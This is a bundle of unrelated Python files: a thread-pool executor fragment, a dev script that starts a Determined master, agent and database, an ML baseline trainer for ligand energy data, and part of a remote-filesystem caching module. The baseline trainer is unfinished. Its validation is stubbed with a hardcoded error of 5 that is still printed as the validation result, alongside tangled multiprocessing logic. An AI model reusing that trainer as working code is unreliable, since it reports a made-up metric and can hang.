logging.debug('Start waiting...')
self._lock.wait()
continue
elif self._state == ThreadPoolExecutorState.STOPPING:
if not self._queue.empty():
task, args = self._queue.get(False)
else:
break
elif self._state == ThreadPoolExecutorState.STOPPED:
break
else:
raise ValueError('Unknown state: %s' % self._state)
if task:
try:
task(*args)
except Exception, ex:
logging.error('Error while executing task in the thread pool.')
logging.exception(ex)
logging.debug('Finished!')
for _ in range(size):
thread = Thread(target=execute_task)
thread.daemon = True
self._pool.append(thread)
def start(self):
"""
Starts the executor by spawning the needed threads.
"""
with self._lock:
self._validate_state(ThreadPoolExecutorState.NOT_STARTED)
self._state = ThreadPoolExecutorState.RUNNING
logging.debug('Spawning %s threads...', self._size)
for thread in self._pool:
thread.start()
def shutdown(self, blocking=True):
"""
Stops the executor. Stopping does not happen immediately: the worker threads will execute all the tasks
from the queue before stopping. The client can choose whether to wait for the stopping process to finish
or to let it happen in the background.
:param blocking: Whether to wait for the stopping process to finish by blocking the current thread.
"""
with self._lock:
self._validate_state(ThreadPoolExecutorState.RUNNING)
self._state = ThreadPoolExecutorState.STOPPING
logging.debug('Notify waiting threads')
self._lock.notifyAll()
logging.debug('Threads notified')
if blocking:
self._wait_threads_to_finish()
else:
wait_thread = Thread(target=self._wait_threads_to_finish)
wait_thread.start()
def _wait_threads_to_finish(self):
"""
Joins the worker threads to the current one and, after they finish, changes the state
of the executor.
"""
for thread in self._pool:
logging.debug('Joining thread %s', thread)
thread.join()
with self._lock:
self._state = ThreadPoolExecutorState.STOPPED
def submit(self, task, *args):
"""
Submits a new task to the executor. The task should be callable and may take unnamed arguments
:param task: The task to be executed.
:param args: The parameters to be passed to the task in the moment of execution.
"""
with self._lock:
self._validate_state(ThreadPoolExecutorState.NOT_STARTED, ThreadPoolExecutorState.RUNNING)
self._queue.put((task, args), False)
self._lock.notify()
def _validate_state(self, *states):
"""
Validates if the current executor's state is in the given ones. If not, raise a ValueError.
:param states: The set of state to check for.
"""
if self._state not in states:
raise ValueError('Invalid state: %s' % self._state)
|
run-server.py
|
import multiprocessing as mp
import socket
import subprocess
import sys
import time
from typing import Callable, List, Optional
# While we could use something like requests (or any other 3rd-party module),
# this script aims to work with the default Python 3.6+.
CLEAR = "\033[39m"
MAGENTA = "\033[95m"
BLUE = "\033[94m"
DB_PORT = 5433
MASTER_PORT = 8081
def kill_process(name: str, process: Optional[mp.Process]) -> None:
if process is not None and process.is_alive():
try:
process.terminate()
except Exception:
print(f"failed to kill process: {name}")
def wait_for_server(port: int, host: str = "localhost", timeout: float = 5.0) -> None:
for _ in range(100):
try:
with socket.create_connection((host, port), timeout=timeout):
return
except OSError:
time.sleep(1)
print(f"Timed out waiting for the {host}:{port}.")
def proc(name: str, cmd: List[str], logs_handler: Callable = lambda x: x) -> mp.Process:
def func() -> None:
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
) as p:
try:
assert p.stdout is not None
for line in p.stdout:
print(logs_handler(line.decode("utf8")), end="", flush=True)
except KeyboardInterrupt:
print(f"Killing Log stream for {name}")
return mp.Process(target=func, daemon=True)
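# Illustrative usage (command and prefix are hypothetical): stream a command's
# combined stdout/stderr through a prefixing handler in a daemon process.
#
#   p = proc("pinger", ["ping", "-c", "3", "localhost"],
#            logs_handler=lambda line: f"pinger | {line}")
#   p.start()
#   p.join()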
def tail_db_logs() -> mp.Process:
return proc("database-logs", ["docker-compose", "logs", "-f"])
def run_master() -> mp.Process:
return proc(
"master",
["../../../master/build/determined-master", "--config-file", "master.yaml"],
logs_handler=lambda line: f"{MAGENTA}determined-master |{CLEAR} {line}",
)
def run_agent() -> mp.Process:
container_master_host = "host.docker.internal" if sys.platform == "darwin" else ""
return proc(
"agent",
[
"../../../agent/build/determined-agent",
"run",
"--config-file",
"agent.yaml",
"--container-master-host",
container_master_host,
],
logs_handler=lambda line: f"{BLUE}determined-agent |{CLEAR} {line}",
)
def is_db_running() -> bool:
try:
with socket.create_connection(("localhost", DB_PORT), timeout=0.5):
return True
except OSError:
return False
def main() -> None:
db, master, agent, db_logs = False, None, None, None
try:
master = run_master()
agent = run_agent()
db_logs = tail_db_logs()
if not is_db_running():
db = True
subprocess.check_call(["docker-compose", "up", "-d"])
wait_for_server(DB_PORT)
db_logs.start()
master.start()
wait_for_server(MASTER_PORT)
agent.start()
# Join the agent first so we can exit if the agent fails to connect to
# the master.
agent.join()
if agent.exitcode != 0:
raise Exception(f"agent failed with non-zero exit code {agent.exitcode}")
master.join()
db_logs.join()
except KeyboardInterrupt:
pass
finally:
kill_process("master", master)
kill_process("agent", agent)
kill_process("db-logs", db_logs)
if db:
subprocess.check_call(["docker-compose", "down"])
if __name__ == "__main__":
main()
|
baseline.py
|
import os
import sys
from multiprocessing import Pool, Process, Queue, Manager
import numpy as np
import h5py as h5
import itertools
import random
import math
from sklearn import svm
from sklearn.linear_model import SGDRegressor
from sklearn.externals import joblib
from sklearn.metrics import mean_squared_error
from tqdm import tqdm
from datetime import datetime
random.seed(datetime.now())
def binSearch(arr, target):
low = 0
high = len(arr)
mid = (low + high)//2
found = False
if target < arr[0]:
return 0
while (not found):
if (target < arr[mid] and target >=arr[mid-1]):
found = True
elif (target >= arr[mid]):
low = mid+1
mid = (low+high)//2
else:
high = mid-1
mid = (low+high)//2
return mid
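# Illustrative behaviour (the array is a list of cumulative chunk sizes, as
# built into chunk_thresholds in Baseline.__init__); the returned index is the
# HDF5 chunk a global sample index falls into:
#   binSearch([10, 25, 40], 3)  -> 0   (first chunk)
#   binSearch([10, 25, 40], 12) -> 1   (second chunk)
#   binSearch([10, 25, 40], 30) -> 2   (third chunk)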
class Baseline:
train_split, val_split, test_split = .7,.1,.2
grid_dim, channels = 72, 6
chunk_size = 50
def __init__(self,db_path=None, storage_folder=None, batch_size=None, id=None):
if (id):
assert (os.path.isdir(os.path.join(storage_folder, 'tmp', str(id)))), "Unable to locate model " + str(id) + " in the specified storage folder: " + storage_folder
self.id = id
self.existing_model = True
else:
self.id = random.randint(100000, 999999) #generate random 6-digit model id
self.existing_model = False
self.batch_size = batch_size
assert os.path.isfile(db_path), "Database does not exist in specified location: " + str(db_path)
os.makedirs(storage_folder, exist_ok=True) #create dir if need be
os.makedirs(os.path.join(storage_folder, 'tmp'), exist_ok=True)
os.makedirs(os.path.join(storage_folder, 'logs'), exist_ok=True)
self.storage_folder = storage_folder #storage folder for model and logs
self.model_folder = os.path.join(storage_folder, 'tmp', str(self.id))
self.log_folder = os.path.join(storage_folder, 'logs', str(self.id))
self.model_file = os.path.join(self.model_folder,str(self.id)+'.pkl')
self.db_path = db_path
self.db_file = h5.File(db_path, mode='r') #handle to file
self.chunk_names = [name for name in self.db_file['labels']]
self.data_chunks = [len(self.db_file['labels'][partition]) for partition in self.db_file['labels']]
self.chunk_thresholds = list(itertools.accumulate(self.data_chunks))
self.total_members = self.chunk_thresholds[-1]
self.train_members = int(round(self.train_split*self.total_members))
self.val_members = int(round(self.val_split*self.total_members))
self.test_members = int(round(self.test_split*self.total_members))
self.total_train_chunks = int(math.ceil(self.train_members/self.chunk_size))
self.total_val_chunks = int(math.ceil(self.val_members/self.chunk_size))
self.train_steps = int(math.ceil(self.chunk_size/batch_size))
self.val_steps = int(math.ceil(self.chunk_size/batch_size))
member_indices = list(range(self.total_members))
random.shuffle(member_indices)
self.train_indices = member_indices[:self.train_members]
self.val_indices = member_indices[self.train_members:self.train_members+self.val_members]
self.test_indices = member_indices[-self.test_members:]
self.train_db_index, self.val_db_index,self.test_db_index = 0,0,0
self.train_chunk_index, self.val_chunk_index = 0,0
self.epochs, self.optimal_epochs = 0, 0
self.min_epochs, self.stop_threshold = 0, 5
#self.master, self.subprocess = Pipe()
self.running_process = False
#self.val_queue = Queue()
self.max_num_processes = 5
self.concurrent_processes = Pool(processes=self.max_num_processes)
self.db_file.close()
def shuffle_train_data(self):
random.shuffle(self.train_indices)
self.train_db_index = 0
def shuffle_val_data(self):
random.shuffle(self.val_indices)
self.val_db_index = 0
def shuffle_test_data(self):
random.shuffle(self.test_indices)
self.test_db_index = 0
def next_train_chunk(self, chunks_processed, results):
hFile = h5.File(self.db_path, 'r', swmr=True)
chunk_size = self.chunk_size
if (self.train_members - chunks_processed) < chunk_size:
chunk_size = self.train_members%chunk_size
batch_ligands = np.zeros([chunk_size, self.grid_dim*self.grid_dim*self.grid_dim*self.channels], dtype=np.float32)
batch_energies = np.zeros([chunk_size], dtype=np.float32)
for i in range(chunks_processed, chunks_processed+chunk_size):
file_index = binSearch(self.chunk_thresholds, self.train_indices[i])
filename = str(self.chunk_names[file_index])
chunk_index = (self.train_indices[i] - self.chunk_thresholds[file_index-1]) if file_index > 0 else self.train_indices[i]
batch_ligands[i-chunks_processed] = hFile['ligands'][filename][chunk_index].flatten()
batch_energies[i-chunks_processed] = hFile['labels'][filename][chunk_index]
results.put([batch_ligands, batch_energies])
hFile.close()
return
def next_val_chunk(self, chunks_processed, results):
hFile = h5.File(self.db_path, 'r', swmr=True)
chunk_size = self.chunk_size
if (self.val_members - chunks_processed) < chunk_size:
chunk_size = self.val_members%chunk_size
batch_ligands = np.zeros([chunk_size, self.grid_dim*self.grid_dim*self.grid_dim*self.channels], dtype=np.float32)
batch_energies = np.zeros([chunk_size], dtype=np.float32)
for i in range(chunks_processed, chunks_processed+chunk_size):
file_index = binSearch(self.chunk_thresholds, self.val_indices[i])
filename = str(self.chunk_names[file_index])
chunk_index = (self.val_indices[i] - self.chunk_thresholds[file_index-1]) if file_index > 0 else self.val_indices[i]
batch_ligands[i-chunks_processed] = hFile['ligands'][filename][chunk_index].flatten()
batch_energies[i-chunks_processed] = hFile['labels'][filename][chunk_index]
results.put([batch_ligands, batch_energies])
hFile.close()
return
def next_train_batch(self, chunk_size):
flag = False
chunk_index = self.train_chunk_index
batch_size = self.batch_size
if (chunk_index + batch_size) > chunk_size:
flag = True
batch_size = chunk_size%batch_size
batch_ligands = self.train_receiver[0][chunk_index:chunk_index+batch_size]
batch_labels = self.train_receiver[1][chunk_index:chunk_index+batch_size]
if flag:
chunk_index = 0
else:
chunk_index += batch_size
self.train_chunk_index = chunk_index
return batch_ligands, batch_labels
def next_val_batch(self, chunk_size):
flag = False
batch_index = self.val_chunk_index
batch_size = self.batch_size
if (batch_index + batch_size) > chunk_size:
flag = True
batch_size = chunk_size%batch_size
batch_ligands = self.val_receiver[0][batch_index:batch_index+batch_size]
batch_labels = self.val_receiver[1][batch_index:batch_index+batch_size]
print(batch_labels)
if flag:
batch_index = 0
else:
batch_index += batch_size
self.val_chunk_index = batch_index
return batch_ligands, batch_labels
def train(self):
if (self.existing_model):
model = joblib.load(self.model_file)
else:
model = SGDRegressor()
lowest_err = float('inf')
stop_iter = 0
manager = Manager()
results = manager.Queue()
total_processes = int(self.train_members//(self.chunk_size*self.max_num_processes))
remain_ligands = self.train_members%(self.chunk_size*self.max_num_processes)
remain_processes = remain_ligands//(self.chunk_size)
final_process_ligands = remain_ligands%self.chunk_size
while True:
self.shuffle_train_data()
jobs = []
process_count = 0
for i in range(self.train_db_index,self.chunk_size*self.max_num_processes,self.chunk_size):
p = Process(target=self.next_train_chunk, args=(i,results))
jobs.append(p)
p.start()
print("starting process: ", process_count)
process_count+=1
self.train_db_index += self.chunk_size*self.max_num_processes
processing_epoch = True
chunk_num = 1
while (chunk_num < total_processes+1):
self.train_receiver = results.get(True)
if results.empty() and chunk_num < total_processes-1:
for p in jobs:
p.terminate()
p.join()
print("did we at least finish joining holy fuck")
for i in range(self.train_db_index,self.chunk_size*self.max_num_processes,self.chunk_size):
print("are we getting to p assignment")
p = Process(target=self.next_train_chunk, args=(i,results))
jobs.append(p)
print("is this where the deadlock is")
p.start()
print("starting process: ",process_count)
process_count+=1
self.train_db_index += self.chunk_size*self.max_num_processes
chunk_num+=1
if chunk_num == total_processes-1:
for i in range(self.train_db_index,self.chunk_size*remain_processes,self.chunk_size):
p = Process(target=self.next_train_chunk, args=(i,results))
jobs.append(p)
p.start()
chunk_num+=1
self.train_db_index = 0
chunk_size = self.train_receiver[1].shape[0]
self.train_chunk_index = 0
for batch in tqdm(range(self.train_steps), desc = "Training Model " + str(self.id) + " - Epoch " + str(self.epochs+1)):
ligands, labels = self.next_train_batch(chunk_size)
model.partial_fit(ligands, labels)
print("reached validation")
#val_err = self.validate(model)
val_err = 5
self.epochs+=1
if (val_err < lowest_err):
lowest_err = val_err
joblib.dump(model, self.model_file)
stop_iter = 0
self.optimal_epochs = self.epochs
else:
stop_iter+=1
if (stop_iter > self.stop_threshold):
print("Finished Training...\n")
print("\nValidation Set Error:", lowest_err)
return
def validate(self, model):
self.shuffle_val_data()
total_mse = 0
manager = Manager()
results = manager.Queue()
jobs = []
for i in range(self.val_db_index,self.chunk_size*self.max_num_processes,self.chunk_size):
p = Process(target=self.next_val_chunk, args=(i,results))
jobs.append(p)
p.start()
processing_val_set = True
step_count = 0
while (processing_val_set):
self.val_receiver = results.get(True)
chunk_size = self.val_receiver[1].shape[0]
for batch in range(self.val_steps):
ligands, labels = self.next_val_batch(chunk_size)
predictions = model.predict(ligands)
mse = mean_squared_error(labels, predictions)
total_mse += mse
if (chunk_size != self.chunk_size):
processing_val_set = False
return total_mse/(self.chunk_size*self.total_val_chunks)
|
remote.py
|
"""
fs.remote
=========
Utilities for interfacing with remote filesystems
This module provides reusable utility functions that can be used to construct
FS subclasses interfacing with a remote filesystem. These include:
* RemoteFileBuffer: a file-like object that locally buffers the contents of
a remote file, writing them back on flush() or close().
* ConnectionManagerFS: a WrapFS subclass that tracks the connection state
of a remote FS, and allows client code to wait for
a connection to be re-established.
* CacheFS: a WrapFS subclass that caches file and directory meta-data in
memory, to speed access to a remote FS.
"""
from __future__ import with_statement
import time
import stat as statinfo
from errno import EINVAL
import fs.utils
from fs.base import threading, FS
from fs.wrapfs import WrapFS, wrap_fs_methods
from fs.wrapfs.lazyfs import LazyFS
from fs.path import *
from fs.errors import *
from fs.local_functools import wraps
from fs.filelike import StringIO, SpooledTemporaryFile, FileWrapper
from fs import SEEK_SET, SEEK_CUR, SEEK_END
_SENTINAL = object()
from six import PY3, b
class RemoteFileBuffer(FileWrapper):
"""File-like object providing buffer for local file operations.
Instances of this class manage a local tempfile buffer corresponding
to the contents of a remote file. All reads and writes happen locally,
with the content being copied to the remote file only on flush() or
close(). Writes to the remote file are performed using the setcontents()
method on the owning FS object.
The intended use-case is for a remote filesystem (e.g. S3FS) to return
instances of this class from its open() method, and to provide the
file-uploading logic in its setcontents() method, as in the following
pseudo-code::
def open(self,path,mode="r"):
rf = self._get_remote_file(path)
return RemoteFileBuffer(self,path,mode,rf)
def setcontents(self,path,file):
self._put_remote_file(path,file)
The contents of the remote file are read into the buffer on-demand.
"""
max_size_in_memory = 1024 * 8
def __init__(self, fs, path, mode, rfile=None, write_on_flush=True):
"""RemoteFileBuffer constructor.
The owning filesystem, path and mode must be provided. If the
optional argument 'rfile' is provided, it must be a read()-able
object or a string containing the initial file contents.
"""
wrapped_file = SpooledTemporaryFile(max_size=self.max_size_in_memory)
self.fs = fs
self.path = path
self.write_on_flush = write_on_flush
self._changed = False
self._readlen = 0 # How many bytes already loaded from rfile
self._rfile = None # Reference to remote file object
self._eof = False # Reached end of rfile?
if getattr(fs, "_lock", None) is not None:
self._lock = fs._lock.__class__()
else:
self._lock = threading.RLock()
if "r" in mode or "+" in mode or "a" in mode:
if rfile is None:
# File was just created, force to write anything
self._changed = True
self._eof = True
if not hasattr(rfile, "read"):
#rfile = StringIO(unicode(rfile))
rfile = StringIO(rfile)
self._rfile = rfile
else:
# Do not use remote file object
self._eof = True
self._rfile = None
self._changed = True
if rfile is not None and hasattr(rfile,"close"):
rfile.close()
super(RemoteFileBuffer,self).__init__(wrapped_file,mode)
# FIXME: What if mode with position on eof?
if "a" in mode:
# Not good enough...
self.seek(0, SEEK_END)
def __del__(self):
# Don't try to close a partially-constructed file
if "_lock" in self.__dict__:
if not self.closed:
try:
self.close()
except FSError:
pass
def _write(self,data,flushing=False):
with self._lock:
# Do we need to discard info from the buffer?
toread = len(data) - (self._readlen - self.wrapped_file.tell())
if toread > 0:
if not self._eof:
self._fillbuffer(toread)
else:
self._readlen += toread
self._changed = True
self.wrapped_file.write(data)
def _read_remote(self, length=None):
"""Read data from the remote file into the local buffer."""
chunklen = 1024 * 256
bytes_read = 0
while True:
toread = chunklen
if length is not None and length - bytes_read < chunklen:
toread = length - bytes_read
if not toread:
break
data = self._rfile.read(toread)
datalen = len(data)
if not datalen:
self._eof = True
break
bytes_read += datalen
self.wrapped_file.write(data)
if datalen < toread:
# We reached EOF,
# no more reads needed
self._eof = True
break
if self._eof and self._rfile is not None:
self._rfile.close()
self._readlen += bytes_read
def _fillbuffer(self, length=None):
"""Fill the local buffer, leaving file position unchanged.
This method is used for on-demand loading of data from the remote file
into the buffer. It reads 'length' bytes from rfile and writes them
into the buffer, seeking back to the original file position.
"""
curpos = self.wrapped_file.tell()
if length == None:
if not self._eof:
# Read all remaining data; we have not reached EOF yet
# Merge endpos - tell + bytes from rfile
self.wrapped_file.seek(0, SEEK_END)
self._read_remote()
self._eof = True
self.wrapped_file.seek(curpos)
elif not self._eof:
if curpos + length > self._readlen:
# Read more data; we have not reached EOF yet
# Load endpos - tell() + len bytes from rfile
toload = length - (self._readlen - curpos)
self.wrapped_file.seek(0, SEEK_END)
self._read_remote(toload)
self.wrapped_file.seek(curpos)
def _read(self, length=None):
if length is not None and length < 0:
length = None
with self._lock:
self._fillbuffer(length)
data = self.wrapped_file.read(length if length != None else -1)
if not data:
data = None
return data
def _seek(self,offset,whence=SEEK_SET):
with self._lock:
if not self._eof:
# Count absolute position of seeking
if whence == SEEK_SET:
abspos = offset
elif whence == SEEK_CUR:
abspos = offset + self.wrapped_file.tell()
elif whence == SEEK_END:
abspos = None
else:
raise IOError(EINVAL, 'Invalid whence')
if abspos != None:
toread = abspos - self._readlen
if toread > 0:
self.wrapped_file.seek(self._readlen)
self._fillbuffer(toread)
else:
self.wrapped_file.seek(self._readlen)
self._fillbuffer()
self.wrapped_file.seek(offset, whence)
def _truncate(self,size):
with self._lock:
if not self._eof and self._readlen < size:
# Read the rest of file
self._fillbuffer(size - self._readlen)
# Lock rfile
self._eof = True
elif self._readlen >= size:
# Crop rfile metadata
self._readlen = size if size != None else 0
# Lock rfile
self._eof = True
self.wrapped_file.truncate(size)
self._changed = True
self.flush()
if self._rfile is not None:
self._rfile.close()
def flush(self):
with self._lock:
self.wrapped_file.flush()
if self.write_on_flush:
self._setcontents()
def _setcontents(self):
if not self._changed:
# Nothing changed, no need to write data back
return
# If not all data loaded, load until eof
if not self._eof:
self._fillbuffer()
if "w" in self.mode or "a" in self.mode or "+" in self.mode:
pos = self.wrapped_file.tell()
self.wrapped_file.seek(0)
self.fs.setcontents(self.path, self.wrapped_file)
self.wrapped_file.seek(pos)
def close(self):
with self._lock:
if not self.closed:
self._setcontents()
if self._rfile is not None:
self._rfile.close()
super(RemoteFileBuffer,self).close()
class ConnectionManagerFS(LazyFS):
"""FS wrapper providing simple connection management of a remote FS.
The ConnectionManagerFS class is designed to wrap a remote FS object
and provide some convenience methods for dealing with its remote
connection state.
The boolean attribute 'connected' indicates whether the remote filesystem
has an active connection, and is initially True. If any of the remote
filesystem methods raises a RemoteConnectionError, 'connected' will
switch to False and remain so until a successful remote method call.
Application code can use the method 'wait_for_connection' to block
until the connection is re-established. Currently this reconnection
is checked by a simple polling loop; eventually more sophisticated
operating-system integration may be added.
Since some remote FS classes can raise RemoteConnectionError during
initialization, this class makes use of lazy initialization. The
remote FS can be specified as an FS instance, an FS subclass, or a
(class,args) or (class,args,kwds) tuple. For example::
>>> fs = ConnectionManagerFS(MyRemoteFS("http://www.example.com/"))
Traceback (most recent call last):
...
RemoteConnectionError: couldn't connect to "http://www.example.com/"
>>> fs = ConnectionManagerFS((MyRemoteFS,["http://www.example.com/"]))
>>> fs.connected
False
>>>
"""
poll_interval = 1
def __init__(self,wrapped_fs,poll_interval=None,connected=True):
super(ConnectionManagerFS,self).__init__(wrapped_fs)
if poll_interval is not None:
self.poll_interval = poll_interval
self._connection_cond = threading.Condition()
self._poll_thread = None
self._poll_sleeper = threading.Event()
self.connected = connected
def setcontents(self, path, data=b'', encoding=None, errors=None, chunk_size=64*1024):
return self.wrapped_fs.setcontents(path, data, encoding=encoding, errors=errors, chunk_size=chunk_size)
def __getstate__(self):
state = super(ConnectionManagerFS,self).__getstate__()
del state["_connection_cond"]
del state["_poll_sleeper"]
state["_poll_thread"] = None
return state
def __setstate__(self,state):
super(ConnectionManagerFS,self).__setstate__(state)
self._connection_cond = threading.Condition()
self._poll_sleeper = threading.Event()
def wait_for_connection(self,timeout=None,force_wait=False):
self._connection_cond.acquire()
try:
if force_wait:
self.connected = False
if not self.connected:
if not self._poll_thread:
target = self._poll_connection
self._poll_thread = threading.Thread(target=target)
self._poll_thread.daemon = True
self._poll_thread.start()
self._connection_cond.wait(timeout)
finally:
self._connection_cond.release()
def _poll_connection(self):
while not self.connected and not self.closed:
try:
self.wrapped_fs.getinfo("/")
except RemoteConnectionError:
self._poll_sleeper.wait(self.poll_interval)
self._poll_sleeper.clear()
except FSError:
break
else:
break
self._connection_cond.acquire()
try:
if not self.closed:
self.connected = True
self._poll_thread = None
self._connection_cond.notifyAll()
finally:
self._connection_cond.release()
def close(self):
if not self.closed:
try:
super(ConnectionManagerFS,self).close()
except (RemoteConnectionError,):
pass
if self._poll_thread:
self.connected = True
self._poll_sleeper.set()
self._poll_thread.join()
self._poll_thread = None
def _ConnectionManagerFS_method_wrapper(func):
"""Method wrapper for ConnectionManagerFS.
This method wrapper keeps an eye out for RemoteConnectionErrors and
adjusts self.connected accordingly.
"""
@wraps(func)
def wrapper(self,*args,**kwds):
try:
result = func(self,*args,**kwds)
except RemoteConnectionError:
self.connected = False
raise
except FSError:
self.connected = True
raise
else:
self.connected = True
return result
return wrapper
wrap_fs_methods(_ConnectionManagerFS_method_wrapper,ConnectionManagerFS)
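# Hedged usage sketch (not part of the original module): it shows how the lazy
# (class, args) form defers construction so a RemoteConnectionError at import time
# does not propagate, and how callers can block until the connection comes back.
# ``MyRemoteFS`` and ``url`` are hypothetical placeholders, not real classes here.
def _connection_manager_usage_example(MyRemoteFS, url):
    fs = ConnectionManagerFS((MyRemoteFS, [url]), poll_interval=5)
    if not fs.connected:
        # Blocks for up to 30 seconds while a background thread polls getinfo("/")
        fs.wait_for_connection(timeout=30)
    return fs.listdir("/")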
class CachedInfo(object):
"""Info objects stored in cache for CacheFS."""
__slots__ = ("timestamp","info","has_full_info","has_full_children")
def __init__(self,info={},has_full_info=True,has_full_children=False):
self.timestamp = time.time()
self.info = info
self.has_full_info = has_full_info
self.has_full_children = has_full_children
def clone(self):
new_ci = self.__class__()
new_ci.update_from(self)
return new_ci
def update_from(self,other):
self.timestamp = other.timestamp
self.info = other.info
self.has_full_info = other.has_full_info
self.has_full_children = other.has_full_children
@classmethod
def new_file_stub(cls):
info = {"info" : 0700 | statinfo.S_IFREG}
return cls(info,has_full_info=False)
@classmethod
def new_dir_stub(cls):
info = {"info" : 0700 | statinfo.S_IFDIR}
return cls(info,has_full_info=False)
class CacheFSMixin(FS):
"""Simple FS mixin to cache meta-data of a remote filesystems.
This FS mixin implements a simplistic cache that can help speed up
access to a remote filesystem. File and directory meta-data is cached
but the actual file contents are not.
If you want to add caching to an existing FS object, use the CacheFS
class instead; it's an easy-to-use wrapper rather than a mixin.
This mixin class is provided for FS implementors who want to use
caching internally in their own classes.
FYI, the implementation of CacheFS is this:
class CacheFS(CacheFSMixin,WrapFS):
pass
"""
def __init__(self,*args,**kwds):
"""CacheFSMixin constructor.
The optional keyword argument 'cache_timeout' specifies the cache
timeout in seconds. The default timeout is 1 second. To prevent
cache entries from ever timing out, set it to None.
The optional keyword argument 'max_cache_size' specifies the maximum
number of entries to keep in the cache. To allow the cache to grow
without bound, set it to None. The default is 1000.
"""
self.cache_timeout = kwds.pop("cache_timeout",1)
self.max_cache_size = kwds.pop("max_cache_size",1000)
self.__cache = PathMap()
self.__cache_size = 0
self.__cache_lock = threading.RLock()
super(CacheFSMixin,self).__init__(*args,**kwds)
def clear_cache(self,path=""):
with self.__cache_lock:
self.__cache.clear(path)
try:
scc = super(CacheFSMixin,self).clear_cache
except AttributeError:
pass
else:
scc()
def __getstate__(self):
state = super(CacheFSMixin,self).__getstate__()
state.pop("_CacheFSMixin__cache",None)
state.pop("_CacheFSMixin__cache_size",None)
state.pop("_CacheFSMixin__cache_lock",None)
return state
def __setstate__(self,state):
super(CacheFSMixin,self).__setstate__(state)
self.__cache = PathMap()
self.__cache_size = 0
self.__cache_lock = threading.RLock()
def __get_cached_info(self,path,default=_SENTINAL):
try:
info = self.__cache[path]
if self.cache_timeout is not None:
now = time.time()
if info.timestamp < (now - self.cache_timeout):
with self.__cache_lock:
self.__expire_from_cache(path)
raise KeyError
return info
except KeyError:
if default is not _SENTINAL:
return default
raise
def __set_cached_info(self,path,new_ci,old_ci=None):
was_room = True
with self.__cache_lock:
# Free up some room in the cache
if self.max_cache_size is not None and old_ci is None:
while self.__cache_size >= self.max_cache_size:
try:
to_del = iter(self.__cache).next()
except StopIteration:
break
else:
was_room = False
self.__expire_from_cache(to_del)
# Atomically add to the cache.
# If there's a race, newest information wins
ci = self.__cache.setdefault(path,new_ci)
if ci is new_ci:
self.__cache_size += 1
else:
if old_ci is None or ci is old_ci:
if ci.timestamp < new_ci.timestamp:
ci.update_from(new_ci)
return was_room
def __expire_from_cache(self,path):
del self.__cache[path]
self.__cache_size -= 1
for ancestor in recursepath(path):
try:
self.__cache[ancestor].has_full_children = False
except KeyError:
pass
def open(self, path, mode='r', buffering=-1, encoding=None, errors=None, newline=None, line_buffering=False, **kwargs):
# Try to validate the entry using the cached info
try:
ci = self.__get_cached_info(path)
except KeyError:
if path in ("", "/"):
raise ResourceInvalidError(path)
try:
ppath = dirname(path)
pci = self.__get_cached_info(ppath)
except KeyError:
pass
else:
if not fs.utils.isdir(super(CacheFSMixin, self), ppath, pci.info):
raise ResourceInvalidError(path)
if pci.has_full_children:
raise ResourceNotFoundError(path)
else:
if not fs.utils.isfile(super(CacheFSMixin, self), path, ci.info):
raise ResourceInvalidError(path)
f = super(CacheFSMixin, self).open(path, mode=mode, buffering=buffering, encoding=encoding, errors=errors, newline=newline, line_buffering=line_buffering, **kwargs)
if "w" in mode or "a" in mode or "+" in mode:
with self.__cache_lock:
self.__cache.clear(path)
f = self._CacheInvalidatingFile(self, path, f, mode)
return f
class _CacheInvalidatingFile(FileWrapper):
def __init__(self, owner, path, wrapped_file, mode=None):
self.path = path
sup = super(CacheFSMixin._CacheInvalidatingFile, self)
sup.__init__(wrapped_file, mode)
self.owner = owner
def _write(self, string, flushing=False):
with self.owner._CacheFSMixin__cache_lock:
self.owner._CacheFSMixin__cache.clear(self.path)
sup = super(CacheFSMixin._CacheInvalidatingFile, self)
return sup._write(string, flushing=flushing)
def _truncate(self, size):
with self.owner._CacheFSMixin__cache_lock:
self.owner._CacheFSMixin__cache.clear(self.path)
sup = super(CacheFSMixin._CacheInvalidatingFile, self)
return sup._truncate(size)
def exists(self, path):
try:
self.getinfo(path)
except ResourceNotFoundError:
return False
else:
return True
def isdir(self, path):
try:
self.__cache.iternames(path).next()
return True
except StopIteration:
pass
except RuntimeError:
pass
try:
info = self.getinfo(path)
except ResourceNotFoundError:
return False
else:
return fs.utils.isdir(super(CacheFSMixin, self), path, info)
def isfile(self, path):
try:
self.__cache.iternames(path).next()
return False
except StopIteration:
pass
except RuntimeError:
pass
try:
info = self.getinfo(path)
except ResourceNotFoundError:
return False
else:
return fs.utils.isfile(super(CacheFSMixin, self), path, info)
def getinfo(self, path):
try:
ci = self.__get_cached_info(path)
if not ci.has_full_info:
raise KeyError
info = ci.info
except KeyError:
info = super(CacheFSMixin, self).getinfo(path)
self.__set_cached_info(path, CachedInfo(info))
return info
def listdir(self,path="",*args,**kwds):
return list(nm for (nm, _info) in self.listdirinfo(path,*args,**kwds))
def ilistdir(self,path="",*args,**kwds):
for (nm, _info) in self.ilistdirinfo(path,*args,**kwds):
yield nm
def listdirinfo(self,path="",*args,**kwds):
items = super(CacheFSMixin,self).listdirinfo(path,*args,**kwds)
with self.__cache_lock:
names = set()
for (nm,info) in items:
names.add(basename(nm))
cpath = pathjoin(path,basename(nm))
ci = CachedInfo(info)
self.__set_cached_info(cpath,ci)
to_del = []
for nm in self.__cache.names(path):
if nm not in names:
to_del.append(nm)
for nm in to_del:
self.__cache.clear(pathjoin(path,nm))
#try:
# pci = self.__cache[path]
#except KeyError:
# pci = CachedInfo.new_dir_stub()
# self.__cache[path] = pci
#pci.has_full_children = True
return items
def ilistdirinfo(self,path="",*args,**kwds):
items = super(CacheFSMixin,self).ilistdirinfo(path,*args,**kwds)
for (nm,info) in items:
cpath = pathjoin(path,basename(nm))
ci = CachedInfo(info)
self.__set_cached_info(cpath,ci)
yield (nm,info)
def getsize(self,path):
return self.getinfo(path)["size"]
def setcontents(self, path, data=b'', encoding=None, errors=None, chunk_size=64*1024):
supsc = super(CacheFSMixin, self).setcontents
        res = supsc(path, data, encoding=encoding, errors=errors, chunk_size=chunk_size)
with self.__cache_lock:
self.__cache.clear(path)
self.__cache[path] = CachedInfo.new_file_stub()
return res
def createfile(self, path, wipe=False):
super(CacheFSMixin,self).createfile(path, wipe=wipe)
with self.__cache_lock:
self.__cache.clear(path)
self.__cache[path] = CachedInfo.new_file_stub()
def makedir(self,path,*args,**kwds):
super(CacheFSMixin,self).makedir(path,*args,**kwds)
with self.__cache_lock:
self.__cache.clear(path)
self.__cache[path] = CachedInfo.new_dir_stub()
def remove(self,path):
